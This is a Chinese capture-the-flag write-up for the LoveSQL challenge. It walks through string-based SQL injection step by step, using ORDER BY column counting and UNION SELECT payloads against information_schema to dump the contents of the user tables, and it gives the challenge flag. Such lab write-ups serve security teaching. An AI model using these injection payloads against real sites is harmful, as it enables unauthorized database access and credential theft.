[极客大挑战 2019]LoveSQL 1

题目环境:
判断注入类型

是否为数字型注入

admin
1

回显结果

是否为字符型注入

admin
1'

回显结果

判断注入手法类型

使用堆叠注入

采用密码参数进行注入

爆数据库
1'; show database();#

回显结果

这里猜测注入语句某字段被过滤,或者是';'被过滤导致不能堆叠注入

爆字段数
1';order by 4#

回显结果

报错

抛弃堆叠注入

步入正题
1' order by 4#

回显结果

成功,但是不存在第4列

同时验证了猜想不能使用堆叠注入

继续判断列数
1' order by 3#

可知列数只有3列

爆数据库

使用联合查询
1' union select 1,2,database()#

爆数据表
1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#

回显结果

爆出两个表

开始爆数据表的字段

按照先后顺序把,先爆第一个

爆geekuser数据表的字段
1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser'#

回显结果

字段:id、username、password

爆geekuser数据表的所有内容
1' union select 1,database(),group_concat(id,username,password) from geekuser#

回显结果

无flag

转手数据表l0ve1ysq1

步骤和数据表geekuser一样,这里直接爆数据表l0ve1ysq1的flag值
1' union select 1,database(),group_concat(password) from l0ve1ysq1#

回显结果


得出flag:
flag{3c4b1ff9-6685-4dcb-853e-06093c1e4040}

相关推荐
先吃饱再说6 小时前
存储的进化:从 MySQL 到浏览器缓存,数据到底住在哪?
数据库
Nturmoils6 小时前
字段太多看不全,ksql 的展开模式和输出控制怎么用
数据库·后端
SkyWalking中文站7 小时前
认识 Horizon UI · 6/17:Trace 探索器
运维·监控·自动化运维
Databend9 小时前
Agent 轨迹分析与归因的数据工程实践
大数据·数据库·agent
这个DBA有点耶9 小时前
SQL改写进阶:标量子查询的“隐形代价”与消除实战
数据库·mysql·架构
程序员老赵10 小时前
服务器文件不想 SFTP 上传?Docker 跑个 File Browser,浏览器就能管理
服务器·docker·开源
火车叼位10 小时前
写给初级开发者:SSL、SSH、HTTPS 与证书体系全解析
运维
smallyoung10 小时前
数据库乐观锁深度解析:MySQL、PostgreSQL 实战 + Spring Boot 集成指南
数据库·mysql·postgresql
parade岁月10 小时前
MySQL JOIN解析:朴实无华但食之有味
数据库·后端
用户31693538118311 小时前
MySQL服务无法启动问题解决全记录
数据库